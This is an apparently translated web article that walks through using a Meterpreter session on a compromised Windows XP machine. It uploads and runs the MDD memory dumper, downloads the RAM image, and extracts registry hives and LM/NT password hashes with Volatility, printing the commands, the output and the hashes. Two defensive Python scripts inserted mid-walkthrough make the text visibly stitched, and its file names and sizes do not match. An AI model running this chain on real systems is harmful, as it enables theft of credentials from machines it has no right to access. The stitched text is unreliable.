Analyzing data security risks in Windows system memory
Added: 2013-11-12 15:01:09
Added by: 思海網絡
ManTech MDD (http://www.mantech.com/msma/MDD.asp) is released under the GPL. MDD can copy the entire contents of memory on the following Microsoft operating systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.
After downloading MDD from the ManTech website, you must run the MDD program from the command line.
MDD command-line usage:
mdd -o <output file name>
For example:
C:\tools\mdd> mdd -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
    This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details.
 -> Dumping 255.48 MB of physical memory to file 'memory.dd'.
    65404 map operations succeeded (1.00)
    0 map operations failed
    took 21 seconds to write
    MD5 is: a48986bb0558498684414e9399ca19fc
The output file is usually referred to as an image. MDD's functionality is limited to copying physical memory, so other tools must be used to analyze the memory image.
Here we use Metasploit Meterpreter together with MDD to carry out the following steps.
First, MDD must be uploaded to the target machine.
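The MD5 that MDD prints at the end of its report, together with the count of failed map operations, is what lets an analyst confirm later that the image being examined is complete and is the one MDD wrote. The following Python script is an added example, not part of the original article and not MDD's own code. It parses a constructed MDD report in the format shown above and compares the reported MD5 with a freshly computed hash of the dump file; the function names, the sample report text and the temporary "dump" file are assumptions made for the example.

```python
import hashlib
import os
import re
import tempfile

# Constructed MDD report in the format shown above. The MD5 line is filled in
# by the demo so that it can be made right or wrong on purpose.
SAMPLE_REPORT = """\
 -> Dumping 255.48 MB of physical memory to file 'memory.dd'.
    65404 map operations succeeded (1.00)
    0 map operations failed
    took 21 seconds to write
    MD5 is: {md5}
"""


def parse_mdd_report(text):
    """Extract the fields worth recording from an MDD report: image name,
    size dumped, number of failed map operations and the MD5 MDD computed."""
    size = re.search(r"Dumping ([\d.]+) MB of physical memory to file '([^']+)'", text)
    failed = re.search(r"(\d+) map operations failed", text)
    md5 = re.search(r"MD5 is:\s*([0-9a-fA-F]{32})", text)
    if not (size and failed and md5):
        raise ValueError("incomplete MDD report")
    return {
        "file": size.group(2),
        "size_mb": float(size.group(1)),
        "failed_ops": int(failed.group(1)),
        "md5": md5.group(1).lower(),
    }


def md5_file(path, chunk_size=1 << 20):
    """Hash a file in chunks; memory images are hundreds of MB or more."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_dump(path, report_text):
    """Return (ok, reasons). ok is False if MDD reported failed map operations
    (gaps in the image) or if the file on disk no longer hashes to MDD's MD5."""
    info = parse_mdd_report(report_text)
    reasons = []
    if info["failed_ops"]:
        reasons.append(f"{info['failed_ops']} map operations failed; image has gaps")
    actual = md5_file(path)
    if actual != info["md5"]:
        reasons.append(f"MD5 mismatch: MDD reported {info['md5']}, file hashes to {actual}")
    return (not reasons, reasons)


def demo():
    """Write a constructed 'dump' to a temporary file and verify it against a
    report carrying the matching MD5 and against one carrying a wrong MD5.
    Returns (True, False)."""
    data = b"\x00" * 4096 + b"constructed memory image contents\n" * 256
    fd, path = tempfile.mkstemp(suffix=".dd")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        good = SAMPLE_REPORT.format(md5=hashlib.md5(data).hexdigest())
        bad = SAMPLE_REPORT.format(md5="0" * 32)
        return verify_dump(path, good)[0], verify_dump(path, bad)[0]
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```

In practice the report text is the console output saved at acquisition time, and `verify_dump()` is run again on the copy that reaches the analysis workstation, so that a transfer error or a truncated download (the 133677056-byte `demo.dd` in the listing below is far smaller than the 511.48 MB MDD reported dumping) is caught before any analysis begins.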
meterpreter > upload /root/mdd.exe .
[*] uploading  : /root/mdd.exe -> .
[*] uploaded   : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                  Name
----              ----       ----  -------------                  ----
100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys
Run MDD on the compromised machine to capture the contents of RAM.
meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
    This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it under certain conditions; use option `-c' for details.
 -> Dumping 511.48 MB of physical memory to file 'memory.dd'.
    130940 map operations succeeded (1.00)
    0 map operations failed
    took 23 seconds to write
    MD5 is: be9d1d906fac99fa01782e847a1c3144
Here we only need to run the tool; the data we need is captured without any further effort.
meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.
Next we confirm that the memory image was captured.
meterpreter > ls

Listing: C:\
============

Mode              Size       Type  Last modified                  Name
----              ----       ----  -------------                  ----
100666/rw-rw-rw-  537604934  fil   Wed Dec 31 19:00:00 -0500 1969  92010NT_Disk2.zip
100777/rwxrwxrwx  0          fil   Wed Dec 31 19:00:00 -0500 1969  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Wed Dec 31 19:00:00 -0500 1969  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Config.Msi
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Documents and Settings
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  GetAd2
100666/rw-rw-rw-  15642      fil   Wed Dec 31 19:00:00 -0500 1969  GetAd2.zip
100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  IO.SYS
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  Inetpub
100444/r--r--r--  0          fil   Wed Dec 31 19:00:00 -0500 1969  MSDOS.SYS
100555/r-xr-xr-x  47580      fil   Wed Dec 31 19:00:00 -0500 1969  NTDETECT.COM
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  PortQryV2
40555/r-xr-xr-x   0          dir   Wed Dec 31 19:00:00 -0500 1969  Program Files
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  RECYCLER
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  System Volume Information
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  WINDOWS
100666/rw-rw-rw-  146        fil   Wed Dec 31 19:00:00 -0500 1969  YServer.txt
100666/rw-rw-rw-  194        fil   Wed Dec 31 19:00:00 -0500 1969  boot.ini
100666/rw-rw-rw-  133677056  fil   Wed Dec 31 19:00:00 -0500 1969  demo.dd
100777/rwxrwxrwx  95104      fil   Wed Dec 31 19:00:00 -0500 1969  mdd.exe
100444/r--r--r--  233632     fil   Wed Dec 31 19:00:00 -0500 1969  ntldr
100666/rw-rw-rw-  402653184  fil   Wed Dec 31 19:00:00 -0500 1969  pagefile.sys
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  passwordcrackers
40777/rwxrwxrwx   0          dir   Wed Dec 31 19:00:00 -0500 1969  share
100777/rwxrwxrwx  869        fil   Wed Dec 31 19:00:00 -0500 1969  update.exe

Download the memory dump using Meterpreter.
meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd
meterpreter >
With the .dd image now available locally, the steps described at http://forensiczone.blogspot.com/2009/01/using-volatility-1.html can be followed to extract sensitive information from memory.
Appendix:
Volatility (https://www.volatilesystems.com/default/volatility)
$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
    connections    Print list of open connections
    connscan       Scan for connection objects
    connscan2      Scan for connection objects (New)
    datetime       Get date/time information for image
    dlllist        Print list of loaded dlls for each process
    dmp2raw        Convert a crash dump to a raw dump
    dmpchk         Dump crash dump information
    files          Print list of open files for each process
    hibinfo        Convert hibernation file to linear raw image
    ident          Identify image properties
    memdmp         Dump the addressable memory for a process
    memmap         Print the memory map
    modscan        Scan for modules
    modscan2       Scan for module objects (New)
    modules        Print list of loaded modules
    procdump       Dump a process to an executable sample
    pslist         Print list of running processes
    psscan         Scan for EPROCESS objects
    psscan2        Scan for process objects (New)
    raw2dmp        Convert a raw dump to a crash dump
    regobjkeys     Print list of open regkeys for each process
    sockets        Print list of open sockets
    sockscan       Scan for socket objects
    sockscan2      Scan for socket objects (New)
    strings        Match physical offsets to virtual addresses (may take a while, VERY verbose)
    thrdscan       Scan for ETHREAD objects
    thrdscan2      Scan for thread objects (New)
    vaddump        Dump the Vad sections to files
    vadinfo        Dump the VAD info
    vadwalk        Walk the vad tree

Supported Plugin Commands:
    cachedump      Dump (decrypted) domain hashes from the registry
    hashdump       Dump (decrypted) LM and NT hashes from the registry
    hivelist       Print list of registry hives
    hivescan       Scan for _CMHIVE objects (registry hives)
    lsadump        Dump (decrypted) LSA secrets from the registry
    memmap_ex_2    Print the memory map
    printkey       Print a registry key, and its subkeys and values
    pslist_ex_1    Print list running processes
    pslist_ex_3    Print list running processes
    usrdmp_ex_2    Dump the address space for a process

Example: volatility pslist -f /path/to/my/file
1. Run hivescan to obtain the required offsets
$ python volatility hivescan -f demo.dd
Offset          (hex)
42168328        0x2837008
42195808        0x283db60
47598392        0x2d64b38
155764592       0x948c770
155973608       0x94bf7e8
208587616       0xc6ecb60
208964448       0xc748b60
234838880       0xdff5b60
243852936       0xe88e688
251418760       0xefc5888
252887048       0xf12c008
256039736       0xf42db38
269699936       0x10134b60
339523208       0x143cb688
346659680       0x14a99b60
377572192       0x16814b60
387192184       0x17141578
509150856       0x1e590688
521194336       0x1f10cb60
523667592       0x1f368888
527756088       0x1f74eb38
2. Run hivelist, passing the first offset found by hivescan
$ python volatility hivelist -f demo.dd -o 0x2837008
Address     Name
0xe2610b60  \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578  \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008  \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888  \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688  \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60  \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60  \WINDOWS\system32\config\software
0xe1a5a7e8  \WINDOWS\system32\config\default
0xe165cb60  \WINDOWS\system32\config\SAM
0xe1a4f770  \WINDOWS\system32\config\SECURITY
0xe1559b38  [no name]
0xe1035b60  \WINDOWS\system32\config\system
0xe102e008  [no name]
3. Password hashes (-y is the system hive offset, -s is the SAM hive offset, both taken from the hivelist output)
$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
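Output in this pwdump format (user:RID:LM hash:NT hash:::) is what a responder records account-hygiene findings from once a memory image has been recovered. The following Python script is an added example, not part of the original article and not Volatility's own code. It parses constructed hashdump lines modeled on the output above (the non-empty hash values are made up) and flags two conditions worth remediating on the host: accounts whose LM field holds anything other than the LM hash of the empty string, meaning the weak LM form of the password is still being stored (the NoLMHash policy under HKLM\SYSTEM\CurrentControlSet\Control\Lsa is not in effect for them), and accounts whose NT field is the NT hash of the empty string, meaning no password is set at all. The two empty-string hash constants are well known; the function names and the sample records are assumptions made for the example.

```python
import re

# Well-known hashes of the empty string as Windows stores them.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed hashdump output in pwdump format (user:RID:LM:NT:::), modeled on
# the listing above. The non-empty hash values are made up for the example.
SAMPLE_HASHDUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text):
    """Yield one dict per well-formed pwdump record. Malformed lines are
    reported and skipped so a truncated dump does not silently lose accounts."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            print(f"line {lineno}: not a pwdump record, skipped: {line!r}")
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        yield rec


def audit_accounts(text):
    """Map each account name to the list of findings that need remediation."""
    findings = {}
    for rec in parse_hashdump(text):
        issues = []
        if rec["lm"] != EMPTY_LM:
            # A real LM hash is present: the password is also stored in the
            # weak LM form, so NoLMHash is not enforced for this account.
            issues.append("LM hash stored")
        if rec["nt"] == EMPTY_NT:
            # NT hash of "" means the account has no password set.
            issues.append("blank password")
        findings[rec["user"]] = issues
    return findings


def accounts_needing_action(text):
    """Sorted names of the accounts with at least one finding."""
    return sorted(user for user, issues in audit_accounts(text).items() if issues)


if __name__ == "__main__":
    for user, issues in audit_accounts(SAMPLE_HASHDUMP).items():
        print(f"{user:<16} {', '.join(issues) or 'ok'}")
```

Run against the page's own listing, the same checks would flag Sarah as having no password and several accounts as still carrying LM hashes; fixing the policy and forcing a password change on the flagged accounts removes exactly the data that this whole acquisition chain was able to recover from RAM.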